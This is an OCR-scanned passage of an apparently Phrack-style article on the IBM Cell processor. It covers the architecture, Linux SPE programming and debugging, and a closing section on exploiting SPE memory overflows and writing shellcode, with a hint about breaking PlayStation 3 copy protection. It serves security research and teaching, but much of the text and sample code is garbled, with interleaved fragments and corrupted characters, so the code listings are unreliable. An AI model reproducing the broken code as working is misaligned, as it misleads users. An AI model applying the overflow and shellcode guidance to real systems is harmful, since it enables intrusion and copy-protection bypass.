n the spring of 2004, a single Cell BE became operational. In the summer 
of the same year, a 2-way SMP version was released. 


H 


The first technical disclosures came just in February 2005, with the 
Simulator [10] and open-source SDK [11] (more on that later) been released 
in November of the same year. In the same month, Mercury started to sell 
Cel (yeah, sell Cell sounds funny) machines. 


Cell Blades was announced by IBM in February of 2006. The SDK 1.1 was 
released in July of the same year, with many improvements. The latest 
version is 3.1. 


---[ 2.2.1 - Problems it solves 


The computer technology have been evolving along the years, but always 
suffering and trying to avoid some barriers. 


Those barriers are physically impossible to be bypassed and that’s why the 
processor clock stopped to grow and multi-core architectures been focused. 


Basically we have three big walls (barriers) to the speedy grow: 
— Power wall 
It’s related to the CMOS technology limits and the hard limit to 
the acceptable system power 


—- Memory wall 
Many comparisons and improvements trying to avoid the DRAM latency 
when compared to the processor frequency 


- Frequency wall 
Diminishing return from deeper pipelines 


For a new architecture to work and be widely deployed, it was also 
important to keep the investments in software development. 


Cell accomplish that being compatible with the 64 bits Power Architecture, 
and attacks the walls in the following ways: 


Non-homogeneous coherent multi-processor and high design 
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frequency at a low operating voltage with advanced power 
management attacks the ‘power wall’. 

— Streaming DMA architecture and three-level memory model (main 
storage, local storage and register files) attacks the ’/memory 
wall’. 
Non-homogeneous coherent multi-processor, highly-optimized 

implementation and large shared register files with software controlled 
branching to allow deeper pipelines attacks the ’/frequency wall’. 


It have been developed to support any OS, which means it supports 
real-time operating system as well non-real time operating systems. 


---[ 2.2.2 - Basic Design Concept 


The basic concept behind cell is it’s asymmetric multi-core design. That 
permits a powerful design, but of course requires specific-—developed 
applications to achieve the most of the architecture. 


Knowing that, becomes clear that the understanding of the new component, 
which is called SPU (synergistic processor unit) or SPE (synergistic 
processor element) proofs to be essential Ss the next section for a 
better understanding of the differences between SPU and SPE. 


---[ 2.2.3 - Architecture Components 


In cell what we have is a core processor, called Power Processor E 
(PPE) which control tasks and synergistic processor elements (SPEs 
data-intensive processing. 


The SPE consists of the synergistic processor unit (SPU), which are a 
processor itself and the memory flow control (MFC), responsible for the 
data movements and synchronization, as well for the interface with the 
high-performance element interconnect bus (EIB). 


Communications with the EIB are done in a 16B/cycle, which means that each 
SPU is interconnected at that speedy with the bus, which supports 
96B/cycle. 


Refer to the picture architecture-components.jpg in the directory images 
of the attached file for a visual of the above explanation. 


---[ 2.2.4 - Processor Components 


As said, the Power Processor Element (PPE) is the core processor which 
control tasks (scheduling). It is a general purpose 64 bit RISC processor 
(Power architecture). 


It’s 2-way hardware multithreaded, with a Ll: 32KB I and D caches and L2: 
512KB cache. 


Has support for real-time operations, like locking the L2 cache and the 
TLB (also it supports managed TLB by hardware and software). It has 
bandwidth and resource reservation and mediated interrupts. 


It’s also connected to the EIB using a 16B/cycle channel (figure 
processor-components. jpg). 


he EIB itself supports four 16 bytes data rings with simultaneous 
transfers per ring (it will be clarified later). 


his bus supports over 100 simultaneous transactions achieving in each bus 
data port more than 25.6 Gbytes/sec in each direction. 


On the other side, the synergistic processor element is a simple RISC 
user-mode architecture supporting dual-issue VMX-like, graphics SP-float 
and IEEE DP-float. 
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Important to note that the SPE itself has dedicated resources: unified 128 


ne 


x 128 bit register files and 256KB local storage. Each SPE has a 
dedicated DMA engine, supporting 16 requests. 


The memory management on this architecture simplified it’s use, with the 


local storage of the SPE being aliased into the PPE system memory (figure 
processor-components2. jpg). 


ma ma 


MFC in the SPE acts as the MMU providing controls over the SPE DMA access 
and it’s compatible with the PowerPC Virtual Memory layout and is software 
controllable using PPE MMIO. 


DMA access supports 1,2,4,8...n*16 bytes transfer, with a maximum of 16 KB 
for I/O, and with two different queues for DMA commands: Proxy & SPU 
(more on this later). 


EIB is also connected in a broadband interface controller (BIC). The 
purpose of this controller is to provide external connectivity for 
devices. It supports two configurable interfaces (60 GB/s) with a 
configurable number of bytes, coherent (BIF) and/or I/O (IOIFx) protocols, 
using two virtual channels per interface, and multiple system 
configurations. 


The memory interface controller (MIC) is also connected to the EIB and is 
a Dual XDR controller (25.6 GB/s) with ECC and suspended DRAM support 
(figure processor-components3.jpg). 


Still are missing two more components: The internal interrupt controller 
(IIC) and the I/O Bus Master Translation (IOT) (figure 
processor-components4.jpg) . 

The IIC handles the SPE interrupts as well as the external interrupts and 
interrupts comming from the coherent interconnect and the IOIFO and IOIF1. 
It is also responsible for the interrupt priority level control and for 
the interrupt generation ports for IPI. Note that the IIC is duplicated 
for each PPE hardware thread. 


IOT translates bus addresses to system real addresses, supporting two 
level translations: 

- I/O segments (256 MB) 

- I/O pages (4K, 64K, 1M, 16M bytes) 


Interesting is the resource of I/O device identifier per page for LPAR use 
(blades) and IOST/IOPT caches managed by software and hardware. 


---[ 2.3 - Debugging Cell 


As the bus is a high-speedy circuit, it’s really difficult to debug the 
architecture and better seen what is going on. 


For that, and also to made it easy to develop software for Cell, IBM 
Research developed a Cell simulator [10] in which you may run Linux and 
install the software development kit [11]. 


The IBM Linux Technology Center brazilian team developed a plugin for 
eclipse as an IDE for the debugger and SDK. Putting it all together is 
possible to have the toolkit installed in a Linux machine, running the 
frontends for the simulator and for the SDK. The debugging interface is 
much better using this frontends. Anyway, it’s important to notice that 
it’s just a frontend for the normal and well know linux tools with 
extended support to Cell processor (GDB and GCC). 


---[ 2.3.1 — Linux -on. Cell 


Linux on cell is an open-source git branch and is provided in the PowerPC 
64 kernel line. 
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It started in the 2.6.15 and is evolving to support many new features, 
like the scheduling improvements for the SPUs (actually it can be 
preempted, and my big friend Andre Detsch who reviewed this article was 
one of the biggest contributors to create an stable code here). 

On Linux it added heterogeneous lwp/thread model, with a new SPE thread 
model (really similar to the pthreads library as we will see later), 
supporting user-mode direct and indirect SPE access, full-preemptive SPE 
context management and for that, spe_ptrace() was create and it’s support 
added to GDB, spe_schedule() for thread to physical spe assigment (it is 
not anymore FIFO - run until completion). 


om 


As a note, the SPE threads shares it’s address space with the parent PPE 


process (using DMA), demand paging for SPE access and shared hardware page 
table with PPE. 


= 


An implementation detail is the PPE proxy thread allocated for each SPE to 
provide a single namespace for both PPE and SPE and assist in SPE 
initiated C99 and Posix library services. 


All the events, error and signal handling for SPEs are done by the parent 
PPE thread. 


The ELF objects for SPE are wrapped into PPE objects with an extended GLD. 


---[ 2.3.2 - Extensions to Linux 


Here I’1ll try to provide some details for Linux running under a Cell 

Hardware. The base hardware used for this reference is a Playstation 3, 
which has 8 SPUs, but one is reserved with the purpose of redundancy and 
another one is used as hypervisor for a custom OS (in this case, Linux). 


All the details are valid for any Linux on Cell and we will provide an 
top-down view approach. 


---[ 2.3.2.1 - User-mode 
Cell supports both power 32 and 64 bits applications, as well as 32 and 64 


cell workloads. It has different programming modes, like RPC, devices 
subsystems and direct/indirect access. 


As already said, it has heterogeneous threads: single SPU, SPU groups and 
shared memory support. 


It runs over a SPE management runtime library, with 32 and 64 bits. This 
library interacts with the SPUFS filesystem (/spu/thread#/) in the 
following ways: 
* Open, close, read, write the files: 
— mem 
This file provides access to the local storage 


— regs 
Access to the 128 register of 128 bits each 


— mbox 
spe to ppe mailbox 


— liox 
spe to ppe interrupt mailbox 


—- xbox_stat 
Get the mailbox status 


- signall 
Signal notification acess 


— signal2 
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Signal notification acess 


— signalx_type 
Signal type 


- npc 
Read/write SP 


Ge 
E 


( 


next program counter 


- fpcer 
SPE 


decr 
SPE decrementer 

—- decr_status 

SPE decrementer status 


hu 


— spu_tag_mask 
Access tag query mask 


—- event_mask 
Access spe event mask 
—- srr0 


Access spe state restor 


register 0 


* open, close mmap the files: 


-— mem 


- signall 


Direct application access to signal 


— signal2 
Direct appl 


lication access to signal 


— Enel 
Direct appl 
mailboxes 


a 
E 


lication access to SPE cont 


ry 
Ei 


The library also provides SPE task control 
the SPE system calls implemented in kernel 
— sys_spu_create_thread 


Allocates a SPE task/context and crea 


1—-mo 


aa 


sys_spu_run 
Activates a SPU task/context on ap 
blocks in the kernel as a proxy thr 
already mentioned 


Some functions provided by the library are re 


l system calls 


for debugging) 


floating point control/status register 


Program State access of the Local Storage 


rols, DMA queues and 


(to interact with 
de), which are: 


tes a directory in SPUFS 


Ge 
bE 


hysical SPE and 
ead to handle the events 


lated to the management of 


the spe tasks, like spe create group, creat 
get/set context, get event, get group, get ls 
get/set priority, get policy, set group defau 
open/close image, write signal, read in_mbox, 
status. 


Obviously the standard 32 and 64 bits powerpc 
it is provided a SPE object loader, responsib 
extension to the normal objects already menti 


thread, get/set affinity, 

, get ps area, get threads, 
lts, group max, kill/wait, 
write out_mbox, read mbox 


ELF (binary) interpreters, 
le for understand the 
oned and for initiate the 


at 


loading of the SPE threads. 


Going down, 
and 64 bits. 


we have the glibc and other GNU 1 


ibraries, both supporting 32 
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The next layer is the normal system-call interface, where we have the SPU 
management framework (through special files in the spufs) and 
modifications in the exec* interface, ina 64bit kernel. 


This modification is done through a special misc format binary, called SPU 
object loader extension. 


Of course there is other kernel extensions, the SPUFS filesystem, which 
provides the management interface and the SPU allocation, scheduling and 
dispatch. 


Also, we do have the Cell BE architecture specific code, supporting multi 
and large pages, SPE event & fault handling, IIC and IOMMU. 


Everything is controlled by a hypervisor, since Linux is what is calleda 
custom OS when running in a Playstation3 hardware (the hypervisor is 
responsible for the protection of the ’secret key’ of the hardware and 
knowing how to exploit SPU vulnerabilities plus some fuzzing on the 
hypervisor may be the needed knowledge to break the game protection copy 
in this hardware). 


GJ 


---[ 2.3.3 - Debugging the SP 


The SDK for Linux on Cell provides good resources for Debugging and better 
understanding of what is going on. 


It’s important to note the environment variables that control the 
behaviour of the system. 


So, if you set the SPU_INFO, for example, the spe runtime library will 
print messages when loading a SPE ELF executable (see above). 


fF export SPU_INFO=1 

./test 
,oading SPE program: ./test 
SPU LS Entry Addr : XXX 


Tors end output —---~--~-— 


And it will also print messages before starting up a new SPE thread, like: 


begin output. =-sosssss= 
Starting SPE thread 0x..., to attach debugger use: spu-gdb -p XXX 
SS SSSanes= end OUuCPUE sasSSsS=5= 


When planning to use the spu-gdb to debug a SPU thread, it’s important to 
remember the SPU_DEBUG_START environment variable, which will include 
everything provided by the SPU_INFO and will stop the thread until a 
debugger is attached or a signal is received. 


Since each SPU register can hold multiple fixed (or floating) point values 
of different sizes, for GDB is provided a data structure that can be 
accessed with different formats. So, specifying the field in the data 
structure, we can update it using different sizes as well: 


begin output -—--------- 
(gdb) ptype $r70 
type = union __gdb_builtin_type_vec128 { 
int128_t uint128; 
float v4_float[4]; 
int32_t v4_int32[4]; 
int1l6_t v8_int16[8]; 
int8_t vl6_int8[16]; 
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(gdb) p $r70.uint128 
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$1 = O0x00018ff000018FFO00018£EOO0018F£D 


(gdb) 


(gdb) p $r70.uint128 


set $r70.v4_int [2]=Oxdeadbeef 


$2 = 0x00018ff000018Ff0deadbeef00018ff0 


So Se SoSSa end OULPUL Sas SS=S>5> 


To permit you to better understand when the SPU code starts the execution 


and follow it gdb also included an 


begin output ---------- 


(gdb) set spu stop-on-load 
(gdb) run 
(gdb) info registers 


S=oSacsce end QUEPUE. sa SSeS >Sc> 


interesting option: 


Another important information for debugging your code is to understand the 


internal sizes and be prepared for overlapping. 
be get using the following fragment code inside your spu program 


Useful information can 
(careful: 


It’s not freeing the allocated memory). 


=== code SS 
extern int _etext; 
extern int _edata; 
extern int _end; 


void meminfo (void) 


{ 


printf ("\n&_etext: %p 
printf ("\n&_edata: %p", &_edata); 
printf("\n&_end: %p", 
printf ("\nsbrk(0): %p 
printf ("\nmalloc(1024): %p" 
printf ("\nsbrk(0): %p", 

} 

--- end code --- 


", -@- etext); 


&_ end); 
", sbrk(0)); 


, malloc(1024)); 


sbrk(0)); 


And of course you can also play with the GCC and LD arguments to have more 


debugging info: 


<= code == 
+ vi Makefile 
CFLAGS += -g 


--- end code --- 


LDFLAGS += -W1,-Map,map_filename.map 


---[ 2.4 - Software Development for Linux on Cell 


In this chapter I will introduce the inners of the Cell development, 
giving the basic knowledge necessary to better understand the further 


chapters. 


---[ 2.4.1 — PPE/SPE 


hello world 


Every program in Cell 
codes. 


Following is a simple 
tar file 


=> code SSS 
#include <stdio.h> 


int main(unsigned long long speid, 


that uses the SPES needs to have at least two source 


= 


One for the PPE and another one for the SPE. 


at 


code to run on the SPE 


(it’s also in the attached 


unsigned long long argp, 


unsigned long long 


envp) 
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printf("\nHello World!\n"); 


return 0; 


--- end code --- 


The Makefile for this code will look like: 


a= code a 
PROGRAM_spu 
LIBRARY _embed 


hello_spu 
hello_spu.a 


IMPORTS = S(SDKLIB_spu)/libc.a 
include (STOP) /make. footer 
--- end code --- 


Of course it looks 


the responsible for the creation of the 


SPE: 


== code es 
include <stdio.h> 


like any normal code. 


include <libspe.h> 


extern spe_program_handle_t hello_spu; 


int main(void) 
{ 


int speid, 


speid=spe_create_thread(0, 


status; 


spe_wait (speid, &status, 1); 


return 0; 


} 


=r ena code: Sos 

With the following Makefile: 
= code a 

DIRS = spu 
PROGRAM _ppu = hello_ppu 


IMPORTS 


--- end code --- 


= 


The PPE as already explained is 


new thread and allocation in the 


&hello_spu, NULL, NULL, -1, 0); 


../spu/hello_spu.a -lspe 
include $(TOP)/make.footer 


The reader will notice that the speid in the PPE program will be the same 
in the main of the SPE. 


value as the speid 


Also, the arguments passed to the spe_cr 


received by the SP 
our sample). 


GJ 


ate_thread() are the ones 


- 


E program when running 


(argp and envp equals to NULL in 


Important to remember that when compiled this program will generate a 


binary in the spu directory, 


directory of this 
hello_spu. 


---[ 2.4.2 - Standard Library Calls from SPE 


a 


called hello_spu and another one in the root 


xample called hello_ppu, which CONTAINS embedded the 


When the SPE program needs to use any standard library call, like for 
exit, it has to call back to the PPE main thread. 


example, printf or 


It uses a simple stop-and-signal assembly instruction with standardized 
arguments value (important to remember that since it’s needed in 


shellcodes for SPE 


). 


That value is returned from the ioctl call and the user thread must react 


13.txt Wed Apr 26 09:43:46 2017 11 
to that. This means copying the arguments from the SPE Local Storage, 
executing the library call and then calling ioctl again. 


The instruction according to the manual: 


"stop ul4 - Stop and signal. Execution is stopped, the current 


address is written to the SPU NPC register, the value ul14 is 


written to the SPU status register, 


the PPU." 


and an interrupt is sent to 


This is a disassembly output of the hello_spu program: 


begin output ---------- 
# spu-gdb ./hello_spu 
GNU gdb 6.3 
Copyright 2004 Free Software Foundation, 


GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 


There is absolutely no warranty for GDB. 


[Type "show copying" to see the conditions. 


Type "show warranty" for details. 


This GDB was configured as "——-host=powerpc64-unknown-linux-gnu target=spu"... 
(gdb) disassemble main 

Dump of assembler code for function main: 

0x00000170 <maintO>: ila $3,0x340 <.rodata> 
0x00000174 <main+4>: stqd $0,16($1) 

0x00000178 <maint8>: nop $127 

Ox0000017c <maint12>: stqd $1,-32 ($1) 

0x00000180 <main+16>: ai SiS 5-32 

0x00000184 <main+t20>: brsl $0,0xla0O <puts> 1a0 
0x00000188 <maint24>: ai $1,$1,32 20 
0x0000018c <main+28>: fsmbi $3,0 

0x00000190 <main+32>: lqd $0,16(S$1) 

0x00000194 <main+36>: bi $0 

0x00000198 <maint40>: stop 

0x0000019c <maint44>: stop 

End of assembler dump. 

(gdb) 


---[ 2.4.3 - Communication Mechanisms 


The architecture offers three main communications mechanism: 


— DMA 


Used to move data and instructions between main storage and 
a local storage. SPEs rely on asyncronous DMA transfers to hide 
memory latency and transfer overhead by moving information in 


parallel with SPU computation. 


— Mailbox 


= 


Used for control communications between a SPE and the 
PPE or other devices. Mailboxes holds 32-bit messages. Each 


receiving messages. 


- Signal Notification 


SPE has two mailboxes for sending messages and one mailbox for 


Used for control communications from PPE or 


other devices. Signal notification 


(also known as signalling) 


uses 32-bit registers that can be configured for 
one-sender-to-one-receiver signalling or 


many-—senders-to-one-receiver signalling. 


All three are controlled and implemented by the SPE MFC and it’s 
importance is related to the way the vulnerable program will receive it’s 


input. 


---[ 2.4.4 - Memory Flow Control (MFC) Commands 


= 


This is the main mechanism for the SPE to access the main storage and 
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maintain syncronization with other processors and devices in the system. 


MFC commands can be issued either by the SPE itself, or by the processor 
and other devices, as follow: 
- A code running on the SPU issue a MFC command by executing a 
series of writes and/or reads using channel instructions. 
- A code running on the PPU or any other device issue a MFC 
command by performing a serie of stores and/or loads to 
memory-mapped I/O (MMIO) registers in the MFC. 


The MFC commands are then queued in one of those independent queues: 
-— MFC SPU Command Queue - For channel-initiated commands by the 
associated SPU 
—- MFC Proxy Command Queue — For MMIO-initiated commands by the PP 
or other devices. 


GJ 


---[ 2.4.5 - Direct Memory Access (DMA) Commands 


The MFC commands that transfers data are referred as DMA commands. The 
transfer direction for DMA commands are based on the SPE point of view: 
- Into a SPE (from main storage to the local storage) -> get 


- Out of a SPE (from local storage to the main storage) -> put 


---[ 2.4.5.1 - Get/Put Commands 


DMA get from the main memory to the local storage: 
(void) mfc_get (volatile void *ls, uint64_t ea, uint32_t size, 
uint32_t tag, uint32_t tid, uint32_t rid) 


DMA put into the main memory from the local storage: 
(void) mfc_put (volatile void *ls, uint64_t ea, uint32_t size, 
UINES2Z-t tag, Wint32 t trd, uint3s2-c rid) 


To guarantee the synchronization of the writes to the main memory, there 
is the options: 
— mfc_putf: the ’f’ means fenced, or, that all commands executed 
before within the same tag group must finish first, later ones 
could be before 


-— mfc_putb: the ’b’ here means barrier, or, that the barrier 
command and all commands issued thereafter are NOT executed 
until all previously issued commands in the same tag group have 
been performed 


---[ 2.4.5.2 - Resources 


For DMA operations the system uses DMA transfers with variable length 
sizes (1, 2, 4, 8 and n*16 bytes (n an integer, of course). There is a 
maximum of 16 KB per DMA transfer and 128b aligments offer better 
performance. 


The DMA queues are defined per SPU, with 16-element queue for 
SPU-initiated requests and 8-element queue for PPU-initiated requests. 
The SPU-initiated request has always a higher priority. 


[To differentiate each DMA command, they receive a tag, with a 5-bit 
identifier. Same identifier can be applied to multiple commands since 
it’s used for polling status or waiting on the completion of the DMA 
commands. 


A great feature provided is the DMA lists, where a single DMA command can 
cause execution of a list of transfers requests (in local storage). Lists 
implements scatter-gather functions and may contain up to 2K transfer 
requests. 


---[ 2.4.5.3 - SPE 2 SPE Communication 
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An address in another SPE local storage is represented as a 32-bit 
ffective address (global address). 


SPE issuing a DMA command needs a pointer to the other SPE’s local 


storage. The PPE code can obtain effective address of an SPE’s local 
storage: 


acai code Ses 
#include <libspe.h> 


speid_t speid; 

void *spe_ls_addr; 
spe_ls_addr=spe_get_ls(speid); 
--- end code --- 


5 


This permits the PPE to give to the SPEs each other local addresses and 
control the communications. Vulnerabilities may arise don’t matter what 


= 


is the communication flow, even without involving the PPE itself. 


md ma 


Follow is a simple DMA demo program between PPE and SPE (see the attached 
file for the complete version) - This program will send an address in the 
PPE to the SPE through DMA: 


—== "PPE Codes ++ 
information_sent is[1l] __attribute__ ((aligned 128))); 
spe_git_t gid; 


int * pointer=(int *)malloc(128); 


gid=spe_create_group(SCHED_OTHER, 0, 1); 


if (spe_group_max(gid) < 1) { 
printf("\nOps, there is no free SPE to run it...\n"); 
exit (EXIT_FAILURE) ; 


} 


is[0].addr = (unsigned int) pointer; 


/* Create the SPE thread */ 
speid=spe_create_thread (gid, &hello_dma, (unsigned long long *) &is[0], NULL, -1, 0); 


/* Wait for the SPE to complete */ 
spe_wait (speids[0], &status[0], 0); 


/* Best pratice: Issue a sync before ending - This is good for us ;) */ 
__asm__ __volatile_ ("synce" : : : "memory"); 

--- end code --- 

--- SPE code --- 

information_sent is __attribute__ ((aligned 128))); 


int main(unsigned long long speid, unsigned long long argp, unsigned long long envp) 


{ 


/* Where: 
is -> Address in local storage to place the data 
argp -> Main memory address 
sizeof(is) -> Number of bytes to read 
31 -> Associated tag to this DMA (from 0 to 31) 
0 -> Not useful here (just when using caching) 
0 -> Not useful here (just when using caching) 
xf 


mfc_get(&is, argp, sizeof(is), 31, 0, 0); 


mfc_write_tag_mask (1<<31); /* Always 1 left-shifted the value of your tag mask */ 


/* Issue the DMA and wait until completion */ 
mfc_read_tag_status_all(); 
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--- end code --- 


And now between two SPEs (also for the complete code, please refer to the 
attached sources): 


=o wPPE “Goder a= 
speid_t speid[2] 
speid[0]=spe_create_thread (0, &dma_spel, NULL, NULL, -1, 0); 
speid[1l]=spe_create_thread (0, &dma_spe2, NULL, NULL, -1, 0); 


for (i=0; i<2; i++) local_store[i]=spe_get_ls(speid[i]); /* Get local storage 
for (i=0; i<2; i++) spe_kill(speid[i], SIGKILL); /* Send SIGKILL to the SPE 
threds */ 

--- end code --- 

aon SPE code vors 


/* Write something to the PPE */ 
spu_write_out_mbox (buffer); 


/* Read something from the PPE */ 
pointer = spu_read_in_mbox(); 


/* DMA interface */ 
mfc_get (buffer, pointer, size, tag, 0, 0); 
wait_on_mask (1<<tag) ; 


/* DMA something to the second SPE */ 
mfc_put (buffer, local_store[1], size, tag, 0, 0); 
wait_on_mask (1<<tag) ; 


/* Notify the PPE */ 
spu_write_out_mbox (1); 
--- end code --- 


GJ 


SSS [ 3 - Exploiting Software Vulnerabilities on Cell SP 


I love the architecture manuals and the engineers and the way they talk 
about really dumb design choices: 


"The SPU Local Store has no memory protection, and memory access wraps 
from the end of the Local Store back to the beginning. An SPU program is 
free to write anywhere in the Local Store including its own instruction 
space. A common problem in SPU programming is the corruption of the SPU 
program text when the stack area overflows into the program area. This 
problem typically does not become apparent until some later point in the 
program execution when the program attempts to execute code in area that 
was corrupted, which typically results in illegal instruction exception. 
Even with a debugger it can be difficult to track down this type of 
problem because the cause and effect can occur far apart in the program 
execution. Adding printf’s just moves failure point around". 


---[ 3.1 - Memory Overflows 


In the aforementioned memory design of the SPU is already cleaver that 
when an attacker controls the overwrite size it’s really easy to exploit a 
SPU vulnerability, just replacing the original program .text with the 
attacker’s one. 


It’s important to note that the SPU interrupt facility can be configured 
to branch to an interrupt handler at address 0 if an external condition is 
true (bisled - branch indirect and set link if external data is the 
instruction used to check if there is external data available). Since the 
memory layout loops around, it’s always possible to overwrite this handler 
if it’s been used. 


Another important note is the fact that instructions on memory MUST be 


address 


*/ 


13.txt Wed Apr 26 09:43:46 2017 15 


aligned on word boundaries. 


There is instruction and data caches for the local storage (depending on 
the implementation details), so it’s important to assure: 
- You are overflowing a large enough amount of data to avoid 
caching 
- You are not using a self-modifying shellcode unless you issue 
the sync instruction (see [13] for references) 


— 


---[ 3.1.1 - SPE memory layout 


= 


The memory layout for the SPE looks like: 


> Ox3FFFF 
SPU ABI Reserved Usage 
| Stack grows from the 
Runtime Stack | higher addresses to 
| the lower addresses. 
Global Data | 
NZ 
. Text 
> 0x00000 


For the purpose of test your application, it’s really interesting to use the 
'size’ application: 


begin output -—--------- 
# size hello_spu 
text data bss dec hex filename 
1346 928 32 2306 902 hello_spu 
See eae = end CUCPUL -s==S= SS >S= 


a 


---[ 3.1.2 - SPE assembly basics 


It’s important in order to develop a shellcode to understand the 


a 


differences in the SPE assembly when comparing to PowerPC. 


The SPE uses risc-based assembly, which means there is a small set of 
instructions and everything in the SPE runs in user-mode (there is no 
kernel-mode for the SPE). That said we need to remember there is no 


= 


system-calls, but instead there is the PPE calls (stop instructions). 


It is also a big endian architecture (keep that in mind while reading the 
following sections). 


This architecture provides many ways to avoid branches in the code for 


maximum efficiency. Since it’s not a real problem while exploiting 
software, I’1l just avoid to talk about and will also avoid to talk about 
SIMD instructions. For more informations on that refer to the SPU 


Instruction Set Architecture document [12]. 


---[ 3.1.2.1 - Registers 


I already explained a little about the way the architecture works and in 
this section I’1ll just include what is the available register set and how 
to use it 


The SPE does not define a conditional register, so the comparison 
operations will set results that are either 0 (false) or 1 (true) with the 
same width as the operands been tested. This results are used to do 
bitwise masking, instruction selection or conditional branching. 


As any other platform, there is general purposes registers and special 


a 


purpose registers in the SPE: 
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— General Purpose Registers (0-127) Used in different ways by the 
instructions. In the second word of R1 you have the information 
about the amount of free space in the stack (the room between 
end of the heap and the start of the stack). 


— Special Purpose Registers 
The SPE also supports 128 special-purpose registers. Some 
interesting ones: 
* SRRO - Save and Restore Register 0 Holds the address 

used by the interrupt return (iret) instruction 
LR - Link Register - All branch instructions that set 
the link register will force the address of the next 
instruction to be loaded on this register 
* CTR -— Count Register - Usually it’s used to hold a loop 

c 

i 

Cc 


ounter (like the loop instruction and %ecx register in 
ntel x86 architecture) 

R - Condition Register Used to perform conditional 
comparisons 


To move data between Special Purpose Registers and General Purpose 
Registers we have the instructions 
* mtspr (move to special purpose register) mfspr (move from 
* special purpose register) 


---[ 3.1.2.2 - Local Storage Addressing Mode 


In order to address information to/from Local Storage the instructions 
uses the following structure: 
Instruction_Opcode 110_field RA_field RT_field 

8-bit 10-bit 7T-bit 7T-bit 


Where: The signed value of the 110 field is appended with 4 zeros and then 
added to the preferred slot in the RA, forcing the 4-rightmost bits of the 


sum to zero. After, the 16 bytes of the local storage address ar 
inserted in the RT field. 


Preferred slot for the architecture point of view are the leftmost 
4 bytes (not bits). 


Important to note here that the IBM convention specifies that: 
110 means a 10-bit immediate value 
RA means a general purpose register to be used as 
source/destination 
RT means a general purpose register to be used as destination 
(target) 


Knowing that makes it easier to understand why the Local Storage Address 
Space is limited to 4 GB. 


The actual size of the Local Storage can be viewed accessing the LSLR 
(local storage limit register). All effective address are ANDed with the 
value in the LSLR before used. 


---[ 3.1.2.3 - External Devices 


The SPU can send/receive data to/from external devices using the channel 
interface. The channel instructions uses quadwords (128bits) to transfer 
data to/from general purpose registers and the channel device (which 
supports 128 channels). 


---[ 3.1.2.4 - Instruction Set 


Here are some useful instructions to be used while developing a shellcode 
for the SPE. 
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Instruction Operands Description 
Sample 
lgd (load quadword) rt, symbol (ra) load a value (16 bytes) 


from Local Storage (pointed by RA to the general purpose register RT) 
lqd $0, 16(S$1) 


stqd (store quadword) rt, symbol (ra) the contents of the 
register (RT) are stored at the local storage address pointed by RA 
stqd $0, 16($1) 


ilh (immediate load halfword) rt,symbol the value of 116 is placed 
in register RT 
ilh $0, Oxla0 


il (immediate load word) rt, symbol the value of 116 is 
expanded to 32bits replicating the leftmost bit and then written to the RT 
il $0, Oxla0d 


nop (no operation) rt this instruction uses a 
false RT and nothing is changed 

nop $127 
ila (immediate load address) rt, symbol the value of the 118 is 


placed in the rightmost 18bits of RT (the remaining bits of RT are zeroed) 
ila $3, 0x340 


a (add word) re, ra;eb the operand on register ra 
is added to the operand on register rb and the result is written to RT 
a $0, $1, $2 


ai (add word immediate) rt,ra,value the value (110 field) is 
added to the operand in ra and the result written to RT 
ai $1, $1, -32 


brsl (branch relative and set link) rt,symbol execution proceeds to the 
target instruction and a link register is set (the symbol is a 116 type 
and it is extended to the rigth with two 0 bits) - The address of the 


current instruction is added to the symbol address for the branch. The 
address of the next instruction is written to the preferred byte of the RT 
register. 

brsl $0, Oxla0d 


fsmbi (form select mask for bytes immediate) rt,symbol the symbol is a 
116 value used to create a mask in the register RT copying eight times 


each bit. Bits in the operand are related to bytes in the result ina 
left-to-right correspondence. fsmbi $3, 0 
bi (branch indirect) ra execution proceeds to the 
preferred slot of RA. The right two bits in the RA are ignored (supposed 
to be zero). There is two flags, D and E to disable and Enable 
interrupts. 

bi $0 


---[ 3.1.3 - Exploiting Software Vulnerabilities in SPE 


First of all it’s important to make it even more clear that it is 
impossible to, for example, force the SPE process to execute a new command 
(a.k.a. execve() shellcodes). The same happens for network-based library 
functions and others, as already explained we need the PPE to proxy that 
for us. 


So it open two new paths: 
—- Create a PPE shellcode to be used while exploiting PPE software 
vulnerabilities that will spawn a proxy for commands received by 
the SPE and will create a SPE thread to do all the job -> This 
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is pure PPC shellcode and this article already discussed 
everything needed to achieve that. In the attached sources you 
have samples in the directory cell-ppe/ [16]. 

—- Create a vulnerability specific code for the SPE, that will 
print out internal program information related to the exploited 
SPE. This is specially interesting and difficult because: 

* Need to remember that the SPE uses instruction-cache, so 
sometimes if you overflow just a small amount of bytes, 
it will be specially difficult to get it executed 

* If you use the wrap-around characteristics of the memory 
layout for the SPE, you will probably overwrite also the 
information you are interested in. 


In the other hand, it’s important to say that everything the information 
will be in the same place (or easier to understand: there is no ASLR in 
the SPE). Running the attached samples (specially the SPE-SPE 
communications because it’s printing the pointers addresses will make it 
clear to the reader). 


---[ 3.1.3.1 - Avoiding Null Bytes 


It is important to avoid null bytes, so we cannot use the NOP instruction 
in our shellcode. 


This creates a problem, since the ori instruction will also generate null 
byte if used with 0 as an argument (e.g: ori $1, $1, 0). 


A good replacement is the instruction or (e.g: or $1, $1, $1) or the usage 


of multiple instructions (which will reduce the probability of your return 
address). 


---[ 3.1.4 - Finding software vulnerabilities on SPE 


The simulator provided by IBM has a feature that monitors selected 
addresses or regions on the Local Store for read and write accesses. This 
feature can help identify stack overflows conditions.o 


Invoked from the simulator command windows as follows: 
enable_stack_checking [spu_number] [spu_executable_filename] 


This procedure uses the nm system utility to determine the area of the 
Local Storage that will contain the program code and creates trigger 
functions to trap writes by the SPU into this region. 


Important to notice that this approach are just looking for writes in the 
text and static data and not to the heap. Of course the same approach 
used by this feature could be used to help the creation of a fuzzer using 
TCL scripts based on the one provided. 


—----- [ 4 - Future and other uses 


I can’t foresee the future, but this kind of architectures are becoming 
more and more common and will open a wide range of new vulnerabilities. 


The complexity behind this kind of asymmetric multi-threaded architectures 
are even higher than the normal ones. The lack of memory protection will 
help also the attackers on how to subvert those systems. The main 
processor been based on an already well-known architecture (powerpc) also 
helps the dissemination of malicious codes. 


Many other researchers are doing stuff using Cell: 
—- Nick Breese presented on Crackstation project in BlackHat [5] 
Basically he used the SIMD capabilities and big registers 
provided by the architecture to crack passwords [5] 


-— IBM Researchers released a study about the usage of the Cell SPU 
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ollector Co-processor [14] 


JTAG-based interfaces on the cell machines to try 


ch [15] 


- Unfortunelly the SPU access are controlled by the PPE so run 
integrity protection mechanisms from SPU seens infeasible -> 
Anyway, I wrote a network traffic analyzer using cell as base 


architechture. 
